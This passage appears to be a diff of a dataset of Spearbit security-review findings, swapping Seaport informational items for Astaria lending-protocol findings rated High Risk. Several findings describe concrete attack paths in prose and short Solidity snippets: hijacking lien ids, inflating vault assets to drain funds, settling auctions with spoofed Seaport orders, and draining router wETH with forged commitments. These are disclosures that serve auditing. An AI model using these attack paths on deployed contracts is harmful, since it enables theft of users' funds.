// address of the attacker lien: ILienToken.Lien({ // note that the lien here would have the same fields as the original message by the vault rep. token: address(s.WETH), vault: incomingTerms.lienRequest.strategy.vault, // address of the vault offering a better term strategyRoot: incomingTerms.lienRequest.merkle.root, collateralId: collateralId, details: details // see below }), stack: stack }) }) Where details provided by the attacker can be calculated by using the below snippet: uint8 nlrType = uint8(_sliceUint(commitment.lienRequest.nlrDetails, 0)); (bytes32 leaf, ILienToken.Details memory details) = IStrategyValidator( s.strategyValidators[nlrType] ).validateAndParse( commitment.lienRequest, s.COLLATERAL_TOKEN.ownerOf( commitment.tokenContract.computeId(commitment.tokenId) ), commitment.tokenContract, commitment.tokenId ); The result is that: The newLienId that was supposed to be _minted for the recipient() of the vault gets minted for the attacker. The call to VaultImplementation.buyoutLien would fail, since the newLienId is already minted, and so the vault would not be able to receive the interest it had anticipated. When there is a payment or Seaport auction settlement, the attacker would receive the funds instead. The attacker can introduce a malicious contract into the protocol, which would be LienToken.ownerOf(newLienId), without needing to register a vault. To execute this attack, the attacker would need to spend the buyout amount of assets. Also, the attacker does not necessarily need to front run a transaction to buy out a lien.
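The DoS works because the lien id is a deterministic hash of the lien's fields and an ERC721 id can only be minted once; a simplified sketch (the struct here is abbreviated, field names taken from the finding):

```solidity
// Abbreviated: the real Lien carries more fields, but none depend on the caller.
struct LienSketch {
    address token;
    address vault;
    bytes32 strategyRoot;
    uint256 collateralId;
}

// Same field values => same id, regardless of msg.sender or receiver, so an
// attacker who copies the vault's pending parameters computes the same id.
function lienId(LienSketch memory lien) pure returns (uint256) {
    return uint256(keccak256(abi.encode(lien)));
}
// ERC721's _mint(attacker, id) succeeds first; the vault's subsequent
// _mint(recipient(), id) reverts because the id already has an owner.
```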
They can pick their own hand-crafted parameters that would satisfy the conditions in the analysis above to introduce themselves into the protocol.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Document that the height provided to _lookupBulkOrderTypehash can only be in a certain range", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Need to have height h provided to _lookupBulkOrderTypehash such that: 1 + 32(h (cid:0) 1) 2 [0, min(0xffffffffffffffff, typeDirectory.codesize) (cid:0) 32] Otherwise typeHash := mload(0) would be 0 or would be padded by zeros. When extcodecopy gets executed extcodecopy(directory, 0, typeHashOffset, 0x20) clients like geth clamp typehashOffset to minimum of 0xffffffff_ffffffff and directory.codesize and pads the result with 0s if out of range. ref: instructions.go#L373 62 common.go#L54", + "title": "VaultImplementation.buyoutLien does not update the new public vault's parameters and does not transfer assets between the vault and the borrower", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "VaultImplementation.buyoutLien does not update the accounting for the vault (if it's public). The slope, yIntercept, and s.epochData[...].liensOpenForEpoch (for the new lien's end epoch) are not updated. They are updated for the payee of the swapped-out lien if the payee is a public vault, by calling handleBuyoutLien. Also, the buyout amount is paid out by the vault itself. The difference between the new lien amount and the buyout amount is not worked out between the msg.sender and the new vault.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Unused imports can be removed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The imported contents in this context are unused.", + "title": "setPayee doesn't update y intercept or slope, allowing vault owner to steal all funds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When setPayee() is called, the payment for the lien is no longer expected to go to the vault. However, this change doesn't impact the vault's y-intercept or slope, which are used to calculate the vault's totalAssets(). This can be used maliciously by a vault owner to artificially increase their totalAssets() to any arbitrary amount: Create a lien from the vault. SetPayee to a non-vault address. Buy out the lien from another vault (this will cause the other vault's y-int and slope to increase, but will not impact the y-int and slope of the original vault because it'll fail the check on L165 that payee is a public vault). Repeat the process again going the other way, and repeat the full cycle until both vaults have the desired totalAssets(). For an existing vault, a vault owner can withdraw a small amount of assets each epoch. If, in any epoch, they are one of the only users withdrawing funds, they can perform this attack immediately before the epoch is processed.
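The payout math that the inflated totalAssets() feeds into is the standard ERC4626-style share-to-asset conversion; a minimal generic sketch (not the project's exact code):

```solidity
// Assets paid out for a redemption scale linearly with totalAssets(), so
// inflating totalAssets() while totalSupply() stays fixed inflates the payout.
function assetsForShares(uint256 shares, uint256 totalAssets_, uint256 totalSupply_)
    pure
    returns (uint256)
{
    return (shares * totalAssets_) / totalSupply_;
}
```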
The result is that the withdrawal shares will be multiplied by totalAssets() / totalShares() to get the withdrawal rate, which can be made artificially high enough to wipe out the entire vault.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "msg.sender is provided as the fulfiller input parameter in a few locations", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "msg.sender is provided as the fulfiller input parameter.", + "title": "settleAuction() doesn't check if the auction was successful", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "settleAuction() is a privileged functionality called by LienToken.payDebtViaClearingHouse(). settleAuction() is intended to be called on a successful auction, but it doesn't verify that that's indeed the case. Anyone can create a fake Seaport order with one of its considerations set as the CollateralToken as described in Issue 93. Another potential issue: if Seaport orders can be \"Restricted\" in the future, then there is a possibility for an authorized entity to force settleAuction on CollateralToken, and when SeaPort tries to call back on the zone to validate, it would fail.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Differences and similarities of ConsiderationDecoder and solc when decoding dynamic arrays of static/fixed base struct type", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The way OfferItem[] in abi_decode_dyn_array_OfferItem and ConsiderationItem[] in abi_- decode_dyn_array_ConsiderationItem are decoded are consistent with solc regarding this: For dynamic arrays of static/fixed base struct type, the memory region looks like: 63 [mPtrLength --------------------------------------------------- [mPtrLength + 0x20: mPtrLength + 0x40) : mPtrLength + 0x20) arrLength memberTail1 - a memory pointer to the array's 1st element ,! ... [mPtrLength + ...: mPtrLength + ...) memberTailN - a memory pointer to the array's Nth element ,! --------------------------------------------------- [memberTail1 ... [memberTailN : memberTailN + ) elementN : memberTail1 + ) element1 The difference is solc decodes and validates (checking dirty bytes) each field of the elements of the array (which are static struct types) separately (one calldataload and validation per field per element).
ConsiderationDecoder skips all those validations for both OfferItems[] and ConsiderationItems[] by copying a chunk of calldata to memory (the tail parts): calldatacopy( mPtrTail, add(cdPtrLength, 0x20), mul(arrLength, OfferItem_size) ) That means for OfferItem[], itemType and token (and also recipient for ConsiderationItem[]) fields can potentially have dirty bytes.", + "title": "Incorrect auction end validation in liquidatorNFTClaim()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "liquidatorNFTClaim() does the following check to recognize that the Seaport auction has ended: if (block.timestamp < params.endTime) { //auction hasn't ended yet revert InvalidCollateralState(InvalidCollateralStates.AUCTION_ACTIVE); } Here, params is completely controlled by users and hence, to bypass this check, the caller can set params.endTime to be less than block.timestamp. Thus, a possible exploit scenario occurs when AstariaRouter.liquidate() is called to list the underlying asset on Seaport, which also sets the liquidator address. Then, anyone can call liquidatorNFTClaim() to transfer the underlying asset to the liquidator by setting params.endTime < block.timestamp.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "PointerLibraries's malloc skips some checks", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "malloc in PointerLibraries skips checking if add(mPtr, size) is OOR or wraps around. Solidity does the following when allocating memory: 64 function allocate_memory(size) -> memPtr { memPtr := allocate_unbounded() finalize_allocation(memPtr, size) } function allocate_unbounded() -> memPtr { memPtr := mload() } function finalize_allocation(memPtr, size) { let newFreePtr := add(memPtr, round_up_to_mul_of_32(size)) // protect against overflow if or(gt(newFreePtr, 0xffffffff_ffffffff), lt(newFreePtr, memPtr)) { // <-- the check that is skipped panic_error_() } mstore(, newFreePtr) } function round_up_to_mul_of_32(value) -> result { result := and(add(value, 31), not(31)) } function panic_error_() { // = cast sig \"Panic(uint256)\" mstore(0, ) mstore(4, ) revert(0, 0x24) } Also note, rounding up the size to the nearest word boundary is hoisted out of malloc.", + "title": "Typed structured data hash used for signing commitments is calculated incorrectly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Since STRATEGY_TYPEHASH == keccak256(\"StrategyDetails(uint256 nonce,uint256 deadline,bytes32 root)\"), the hash calculated in _encodeStrategyData is incorrect according to EIP-712: s.strategistNonce is of type uint32 and the nonce type used in the type hash is uint256. Also the struct name used in the typehash collides with the StrategyDetails struct name defined as: struct StrategyDetails { uint8 version; uint256 deadline; address vault; }", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "abi_decode_bytes can populate memory with dirty bytes", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When abi_decode_bytes decodes bytes, it rounds its size and copies the rounded size from calldata to memory. This memory region might get populated with dirty bytes.
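For the typed-data finding above, a consistent encoding would hash every member with the exact type named in the typehash string; a minimal sketch (assumes the stored uint32 nonce is widened to uint256, and that the colliding struct is renamed or given its own typehash):

```solidity
bytes32 constant STRATEGY_TYPEHASH =
    keccak256("StrategyDetails(uint256 nonce,uint256 deadline,bytes32 root)");

// EIP-712 struct hash: abi.encode (not encodePacked) of the typehash followed
// by each member, with the uint32 storage nonce cast up to uint256 to match
// the declared type.
function strategyStructHash(uint32 strategistNonce, uint256 deadline, bytes32 root)
    pure
    returns (bytes32)
{
    return keccak256(
        abi.encode(STRATEGY_TYPEHASH, uint256(strategistNonce), deadline, root)
    );
}
```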
So for example: For both signature and extraData we are using abi_decode_bytes. If the AdvancedOrder is tightly packed and: If signature's length is not a multiple of a word (0x20) part of the extraData.length bytes will be copied/duplicated to the end of signature's last memory slot. If extraData's length is not a multiple of a word (0x20) part of the calldata that comes after extraData's tail will be copied to memory. Even if AdvancedOrder is not tightly packed (tail offsets are multiple of a word relative to the head), the user can stuff the calldata with dirty bits when signature's or extraData's length is not a multiple of a word. And those dirty bits will be carried over to memory during decoding. Note, these extra bits will not be overridden or 65 cleaned during the decoding because of the way we use and update the free memory pointer (incremented by the rounded-up number to a multiple of a word).", + "title": "makePayment doesn't properly update stack, so most payments don't pay off debt", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "As we loop through individual payments in _makePayment, each is called with: (newStack, spent) = _payment( s, stack, uint8(i), totalCapitalAvailable, address(msg.sender) ); This call returns the updated stack as newStack but then uses the function argument stack again in the next iteration of the loop. The newStack value is unused until the final iteration, when it is passed along to _updateCollateralStateHash(). This means that the new state hash will be the original state with only the final loan repaid, even though all other loans have actually had payments made against them.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "abi_encode_validateOrder reuses a memory region", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "It is really important to note that before abi_encode_validateOrder is called, _prepareBasicFul- fillmentFromCalldata(...) needs to be called to populate the memory region that is used for event OrderFul- filled(...) which can be reused/copied in this function: MemoryPointer.wrap(offerDataOffset).copy( dstHead.offset(tailOffset), offerAndConsiderationSize ); From when the memory region for OrderFulfilled(...) is populated till we reach this point, care needs to be taken to not modified that region. accumulator data is written to the memory after that region and the current implementation does not touch that region during the whole call after the event has been emitted.", + "title": "_removeStackPosition() always reverts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "_removeStackPosition() always reverts since it indexes the stack array beyond its length: for (i; i < length; ) { unchecked { newStack[i] = stack[i + 1]; ++i; } } Notice that for i==length-1, stack[length] is called. This reverts since length is the length of the stack array. Additionally, the intention is to delete the element from stack at index position and shift left the elements appearing after this index.
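For reference, a corrected shift loop might look like the following sketch (same local names as the quoted snippet; newStack is assumed to have length - 1 elements):

```solidity
// Shift the tail left by one; stopping at length - 1 ensures stack[i + 1]
// never reads past the end, and starting at position fills every slot of
// newStack from position onward exactly once.
for (uint256 i = position; i < length - 1; ) {
    unchecked {
        newStack[i] = stack[i + 1];
        ++i;
    }
}
```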
In addition, in the original code an extra increment to the loop index i results in newStack[position] being empty, and the shift of other elements doesn't happen.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "abi_encode_validateOrder writes to a memory region that might have been potentially dirtied by accumulator", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In abi_encode_validateOrder potentially (in the future), we might be writing in an area where accumulator was used. And since the book-keeping for the accumulator does not update the free memory pointer, we need to make sure all bytes in the memory in the range [dst, dst+size) are fully updated/written to in this function.", + "title": "Refactor _paymentAH()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "_paymentAH() has several vulnerabilities: stack is a memory parameter, so all the updates made to stack are not applied back to the corresponding storage variable. No need to update stack[position] as it's deleted later. decreaseEpochLienCount() is always passed 0, as stack[position] is already deleted. Also decreaseEpochLienCount() expects epoch, but end is passed instead. This if/else block can be merged. updateAfterLiquidationPayment() expects msg.sender to be LIEN_TOKEN, so this should work.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Reorder writing to memory in ConsiderationEncoder to follow the order in struct definitions.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Reorder the memory writes in ConsiderationEncoder to follow the order in struct definitions.", + "title": "processEpoch() needs to be called regularly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "If the processEpoch() endpoint does not get called regularly (especially close to the epoch boundaries), the updated currentEpoch would lag behind the actual expected value and this will introduce arithmetic errors in formulas regarding epochs and timestamps.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: High Risk" ] }, { "title": "Can create lien for collateral while at auction by passing spoofed data", "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", "body": "In the createLien function, we check that the collateral isn't currently at auction before giving a lien with the following check: if ( s.collateralStateHash[params.collateralId] == bytes32(\"ACTIVE_AUCTION\") ) { revert InvalidState(InvalidStates.COLLATERAL_AUCTION); } However, collateralId is passed in multiple places in the params: both in params directly and in params.encumber.lien. The params.encumber.lien.collateralId is used everywhere else, and is the final value that is used. But the check is performed on params.collateralId. As a result, we can set the following: params.encumber.lien.collateralId: collateral that is at auction. params.collateralId: collateral not at auction.
This will allow us to pass this validation while using the collateral at auction for the lien.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: High Risk" ] }, { - "title": "The compiled YUL code includes redundant consecutive validation of enum types", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Half the location where an enum type struct field has been used/accessed, the validation function for this enum type is performed twice: validator_assert_enum_(memPtr) validator_assert_enum_(memPtr)", + "title": "stateHash isn't updated by buyoutLien function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "We never update the collateral state hash anywhere in the buyoutLien function. As a result, once all checks are passed, payment will be transferred from the buyer to the seller, but the seller will retain ownership of the lien in the system's state.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Consider writing tests for revert functions in ConsiderationErrors", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "ConsiderationErrors.sol is a new file and is untested. Writing test cases to make sure the revert functions are throwing the right errors is an easy way to prevent mistakes.", + "title": "If a collateral's liquidation auction on Seaport ends without a winning bid, the call to liquidatorNFTClaim does not clear the related data on LienToken's side and also for payees that are public vaults", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "If/when a liquidation auction ends without being fulfilled/matched on Seaport and afterward when the current liquidator calls into liquidatorNFTClaim, the storage data (s.collateralStateHash, s.auctionData, s.lienMeta) on the LienToken side don't get reset/cleared and also the lien token does not get burnt. That means: s.collateralStateHash[collateralId] stays equal to bytes32(\"ACTIVE_AUCTION\"). s.auctionData[collateralId] will have the past auction data. s.lienMeta[collateralId].atLiquidation will be true. That means future calls to commitToLiens by holders of the same collateral will revert.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Typo in comment for the selector used in ConsiderationEncoder.sol#abi_encode_validateOrder()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Minor typo in comments: // Write ratifyOrder selector and get pointer to start of calldata dst.write(validateOrder_selector);", + "title": "ClearingHouse cannot detect if a call from Seaport comes from a genuine listing or auction", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Anyone can create a SeaPort order with one of the considerations' recipients set to a ClearingHouse with a collateralId that is genuinely already set for auction. Once the spoofed order settles, SeaPort calls into this fallback function and causes the genuine Astaria auction to settle.
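A sketch of why the fallback cannot distinguish the two cases (contract and storage names follow the findings; this is an illustration, not the actual ClearingHouse code):

```solidity
// Seaport pays a consideration recipient by simply calling/transferring into
// it; the recipient sees no order hash. So a ClearingHouse fallback like this
// has nothing to bind the incoming settlement to the auction it created.
contract ClearingHouseSketch {
    fallback() external payable {
        // A check like require(msg.sender == SEAPORT) would hold for spoofed
        // orders too; nothing here ties the call to the order hash stored in
        // s.collateralIdToAuction[collateralId], so a 1-wei spoofed order can
        // trigger settlement of the real auction.
    }
}
```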
This allows an attacker to set random items on sale on SeaPort with funds directed here (small buying prices) to settle genuine Astaria auctions on the protocol. This causes: The Astaria auction payees and the liquidator would not receive what they would expect to come from the auction. And if the payee is a public vault, it would introduce incorrect parameters into its system. Lien data (s.lienMeta[lid]) and the lien token get deleted/burnt. Collateral token and data get burnt/deleted. When the actual genuine auction settles and calls back to here, it will revert due to the s.collateralIdToAuction[collateralId] check.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "_contractNonces[offerer] gets incremented even if the generateOrder(...)'s return data does not satisfy all the constrainsts.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "_contractNonces[offerer] gets incremented even if the generateOrder(...)'s return data does not satisfy all the constraints. This is the case when errorBuffer !=0 and revertOnInvalid == false (ful- fillAvailableOrders, fulfillAvailableAdvancedOrders). In this case, Seaport would not call back into the contract offerer's ratifyOrder(...) endpoint. Thus, the next time this offerer receives a ratifyOrder(...) call from Seaport, the nonce shared with it might have incremented more than 1.", + "title": "c.lienRequest.strategy.vault is not checked to be a registered vault when commitToLiens is called", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When commitToLiens calls IVaultImplementation(c.lienRequest.strategy.vault).commitToLien( ... ), the value of c.lienRequest.strategy.vault is not checked whether it is a registered vault within the system (by checking s.vaults). The caller can set this value to any address they would desire and potentially perform some unwanted actions. For example, the user could spoof all the values in commitments so that the later dependent contracts' checks are skipped and lastly we end up transferring funds: s.TRANSFER_PROXY.tokenTransferFrom( address(s.WETH), address(this), // <--- AstariaRouter address(msg.sender), totalBorrowed ); Note that since all checks are skipped, the caller can also indirectly set totalBorrowed to any value they would desire. And so, if AstariaRouter holds any wETH at any point in time, anyone can craft a payload to commitToLiens to drain its wETH balance.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Users need to be cautious about what proxied/modified Seaport or Conduit instances they approve their tokens to", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Seaport ( S ) uses EIP-712 domain separator to make sure that when users sign orders, the signed orders only apply to that specific Seaport by pinpointing its name, version, the chainid, and its address. The domain separator is calculated and cached once the Seaport contract gets deployed. The domain separator only gets recalculated when/if the chainid changes (in the case of a hard fork for example). Some actors can take advantage of this caching mechanism by deploying a contract ( S0 ) that : Delegates some of its endpoints to Seaport or it's just a proxy contract.
Its codebase is almost identical to Seaport except that the domain separator actually replicates what the original Seaport is using. This only requires 1 or 2 lines of code change (in this case the caching mechanism is not important) function _deriveDomainSeparator() { ... // Place the address of this contract in the next memory location. mstore(FourWords, MAIN_SEAPORT_ADDRESS) // <--- modified line and perhaps the actor can define a ,! named constant Assume a user approves either: 1. Both the original Seaport instance and the modified/proxied instance or, 2. A conduit that has open channels to both the original Seaport instance and the modified/proxied instance. And signs an order for the original Seaport that in the 1st case doesn't use any conduits or in the 2nd case the order uses the approved conduit with 2 open channels. Then one can use the same signature once with the original Seaport and once with the modified/proxied one to receive more tokens than offerer / user originally had intended to sell.", + "title": "Anyone can take a loan out on behalf of any collateral holder at any terms", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In the _validateCommitment() function, the initial checks are intended to ensure that the caller who is requesting the lien is someone who should have access to the collateral that it's being taken out against. The caller also inputs a receiver, who will be receiving the lien. In this validation, this receiver is checked against the collateral holder, and the validation is approved in the case that receiver == holder. However, this does not imply that the collateral holder wants to take this loan. This opens the door to a malicious lender pushing unwanted loans on holders of collateral by calling commitToLien with their collateralId, as well as their address set to the receiver. This will pass the receiver == holder check and execute the loan. In the best case, the borrower discovers this and quickly repays the loan, incurring a fee and a small amount of interest. In the worst case, the borrower doesn't know this happens, and their collateral is liquidated.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "ZoneInteraction contains logic for both zone and contract offerers", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "ZoneInteraction contains logic for both zone and contract offerers.", + "title": "Strategist Interest Rewards will be 10x higher than expected due to incorrect divisor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "VAULT_FEE is set as an immutable argument in the construction of new vaults, and is intended to be set in basis points. However, when the strategist interest rewards are calculated in _handleStrategistInterestReward(), the VAULT_FEE is only divided by 1000.
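A worked example of the divisor bug with generic basis-points arithmetic (VAULT_FEE = 500, i.e. 5%, is an assumed value):

```solidity
uint256 constant VAULT_FEE = 500; // intended meaning: 500 bps = 5%

// Dividing by 1000 makes the fee 10x too large: 500 / 1000 = 50% of interest.
function feeAsImplemented(uint256 interest) pure returns (uint256) {
    return (interest * VAULT_FEE) / 1000;
}

// Basis points require a 10_000 divisor: 500 / 10_000 = 5% of interest.
function feeAsIntended(uint256 interest) pure returns (uint256) {
    return (interest * VAULT_FEE) / 10_000;
}
```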
The result is that the fee calculated by the function will be 10x higher than expected, and the strategist will be dramatically overpaid.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Orders of CONTRACT order type can lower the value of a token offered", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Sometimes tokens have extra value because of the derived tokens owned by them (for example an accessory for a player in a game). With the introduction of contract offerer, one can create a contract offerer that automatically lowers the value of a token, for example, by transferring the derived connected token to a different item when Seaport calls the generateOrder(...). When such an order is included in a collection of orders the only way to ensure that the recipient of the item will hold a token which value hasn't depreciated during the transaction is that the recipient would also need to use a kind of mirrored order that incorporates either a CONTRACT or restricted order type that can do a post-transfer check.", + "title": "The lower bound for liquidationInitialAsk for new liens needs to be stricter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "params.lien.details.liquidationInitialAsk (L_new) is only compared to params.amount (A_new), whereas in _appendStack newStack[j].lien.details.liquidationInitialAsk (L_j) is compared to potentialDebt. potentialDebt is the aggregated sum of all potential owed amounts at the end of each position/lien. So in _appendStack we have: o_new + o_n + ... + o_j <= L_j, where o_j is _getOwed(newStack[j], newStack[j].point.end), which is the amount for the stack slot plus the potential interest at the end of its term. So it would make sense to enforce a stricter inequality for L_new: (1 + r * (t_end - t_now) / 10^18) * A_new = o_new <= L_new. The big issue regarding the current lower bound is when the borrower only takes one lien and for this lien liquidationInitialAsk == amount (or they are close). Then at any point during the lien term (maybe very close to the end), the borrower can atomically self-liquidate and settle the Seaport auction in one transaction. This way the borrower can skip paying any interest (they would need to pay OpenSea fees and potentially royalty fees) and they would additionally receive liquidation fees.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Restricted order checks in case where offerer and the fulfiller are the same", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Seaport 1.2 disallowed skipping restricted order checks when offerrer and fulfiller are the same. Remove special-casing for offerer-fulfilled restricted orders: Offerers may currently bypass restricted order checks when fulfilling their own orders. This complicates reasoning about restricted order validation, can aid in the deception of other offerers or fulfillers in some unusual edge cases, and serves little practical use. 
However, in the case of the offerer == fulfiller == zone, the check continues to be skipped.", + "title": "commitToLiens transfers extra assets to the borrower when protocol fee is present", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "totalBorrowed is the sum of all commitments[i].lienRequest.amount. But if s.feeTo is set, some of the funds/assets from the vaults get transferred to s.feeTo when _handleProtocolFee is called and only the remainder is sent to the ROUTER(). So in this scenario, the total amount of assets sent to ROUTER() (so that it can be transferred to msg.sender) is, up to rounding errors: (1 - n_p/d_p) * T, where T is the totalBorrowed, n_p is s.protocolFeeNumerator and d_p is s.protocolFeeDenominator. But we are transferring T to msg.sender, which is more than we are supposed to send,", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Clean up inline documentation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The comments highlighted in Context need to be removed or updated. Remove the following: 73 ConsiderationEncoder.sol:216: // @todo Dedupe some of this ConsiderationEncoder.sol:316: // @todo Dedupe some of this ZoneInteraction.sol:97: // bytes memory callData; ZoneInteraction.sol:100: // function(bytes32) internal view errorHandler; ZoneInteraction.sol:182: // let magicValue := shr(224, mload(callData)) ConsiderationStructs.sol#L167 and ZoneInteraction.sol#L82 contain an outdated comment about the extraData attribute. There is no longer a staticcall being done, and the function isValidOrderIn- cludingExtraData no longer exists. The NatSpec comment for _assertRestrictedAdvancedOrderValidity mentions: /** * @dev Internal view function to determine whether an order is a restricted * * * * * order and, if so, to ensure that it was either submitted by the offerer or the zone for the order, or that the zone returns the expected magic value upon performing a staticcall to `isValidOrder` or `isValidOrderIncludingExtraData` depending on whether the order fulfillment specifies extra data or criteria resolvers. A few of the facts are not correct anymore: * This function is not a view function anymore and change the storage state either for a zone or a contract offerer. * It is not only for restricted orders but also applies to orders of CONTRACT order type. * It performs actuall calls and not staticcalls anymore. * it calls the isValidOrder endpoint of a zone or the ratifyOrder endpoint of a contract offerer depending on the order type. * If it is dealing with a restricted order, the check is only skipped if the msg.sender is the zone. Seaport is called by the offerer for a restricted order, the call to the zone is still performed. If Same comments apply to _assertRestrictedBasicOrderValidity excluding the case when order is of CONTRACT order type. 
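For the protocol-fee finding above, a minimal sketch of the arithmetic: once _handleProtocolFee skims n_p/d_p of totalBorrowed to s.feeTo, only the remainder can be forwarded to the borrower. Variable names mirror the finding's notation; the contract itself and the concrete fee values are illustrative.

pragma solidity ^0.8.17;

contract ProtocolFeeShareSketch {
    uint256 public protocolFeeNumerator = 50;      // n_p (illustrative value)
    uint256 public protocolFeeDenominator = 10000; // d_p (illustrative value)

    // Amount actually available for msg.sender after the fee is skimmed:
    // (1 - n_p/d_p) * T, up to rounding, rather than T itself.
    function borrowerShare(uint256 totalBorrowed) external view returns (uint256) {
        uint256 fee = (totalBorrowed * protocolFeeNumerator) / protocolFeeDenominator;
        return totalBorrowed - fee;
    }
}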
